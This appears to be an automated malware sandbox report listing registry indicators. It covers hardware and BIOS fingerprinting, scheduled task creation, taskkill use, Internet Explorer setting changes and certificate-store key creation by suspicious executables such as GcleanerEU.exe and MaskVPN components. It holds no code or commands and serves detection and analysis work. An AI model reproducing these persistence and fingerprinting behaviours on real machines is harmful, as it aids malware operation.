| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Filters | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Service | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\Documents\SVzPjmmtaOBGm0pqcQuZdnkT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\Documents\SVzPjmmtaOBGm0pqcQuZdnkT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
